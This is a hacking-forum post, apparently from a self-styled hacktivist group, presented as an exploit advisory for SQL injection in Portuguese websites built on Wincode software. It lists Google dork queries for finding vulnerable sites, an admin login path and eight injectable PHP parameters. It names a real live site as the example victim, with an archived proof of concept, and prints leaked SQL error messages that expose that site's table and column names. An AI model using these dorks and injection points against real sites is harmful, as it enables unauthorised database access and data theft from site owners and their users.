Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Powered by Wincode Software Portugal SQL Injection Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimiçi
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2742
Mesaj Sayısı: 6282
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Powered by Wincode Software Portugal SQL Injection Vuln
01.10.2018 09:30
################################################################################​#################

# Exploit Title : Powered by Wincode Software Portugal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/10/2018
# Vendor Homepage : wincode.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:''Copyright © 2016 - Wincode, Software e Contabilidade S.A.''

intext:''Powered by Wincode''

intext:''Desenvolvimento de Software, Internet, Informática e Contabilidade Wincode''

# Admin Control Panel From Hosting :

wincode.pt/login/

# SQL Injection Exploits :

/verEmpreendimento.php?id=[SQL Injection]

/empreendimentos.php?codigo=[SQL Injection]

/verImovel.php?id=[SQL Injection]

/associados.php?id=[SQL Injection]

/pesquisa.php?codigo=[SQL Injection]

/pesquisaavancada.php?codigo=[SQL Injection]

/informacoes.php?codigo=[SQL Injection]

/avancada.php?codigo=[SQL Injection]

################################################################################​#################

# Example Vulnerable Site => portugalinvest.pt/verEmpreendimento.php?id=207%27 => [ Proof of Concept ] => archive.fo/w7N5b

# SQL Database Error =>

Erro: SQL Inválido: select * from (((gi_empreendimentos left join gi_concelhos on(codigo_conc=concelho_empr and distrito_conc=
distrito_empr)) left join gi_freguesias on(distrito_empr=distrito_freg and concelho_empr=concelho_freg and freguesia_empr=codigo_freg))
left join gi_distritos on(distrito_empr=codigo_dist)) left join gi_zonas on(zona_empr=codigo_zon) where codigo_empr='207''

Erro: Não existe nenhuma query.

Erro: SQL Inválido: select * from gi_empresa where codigo_emp = '1''

Erro: Não existe nenhuma query.

Erro: SQL Inválido: select visual_stat as rows from gi_imo_stats where imo_stat=27516'

Erro: Não existe nenhuma query.

Erro: SQL Inválido: insert into gi_imo_stats values (27516', '', 1)

Erro: SQL Inválido: select * from ((((((gi_imoveis left join gi_timoveis on(gi_imoveis.tipo_imovel_imo=gi_timoveis.codigo_timo))
left join gi_modalidades on modalidade_imo=codigo_mod) left join gi_concelhos on(codigo_conc=concelho_imo and distrito_conc=distrito_imo))
left join gi_tipologia on(tipologia_imo=codigo_tip)) left join gi_freguesias on(distrito_imo=distrito_freg and concelho_imo=concelho_freg and
freguesia_imo=codigo_freg)) left join gi_distritos on(distrito_imo=codigo_dist)) left join gi_zonas on(zona_imo=codigo_zon) where codigo_imo='27516''

Erro: Não existe nenhuma query.

Erro: SQL Inválido: select count(codigo_imo) as rows from gi_imoveis where activo_imo='s' and empr_imo='207''

Erro: Não existe nenhuma query.

Erro: SQL Inválido: select * from gi_empresa where codigo_emp = '1''

Erro: Não existe nenhuma query.

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi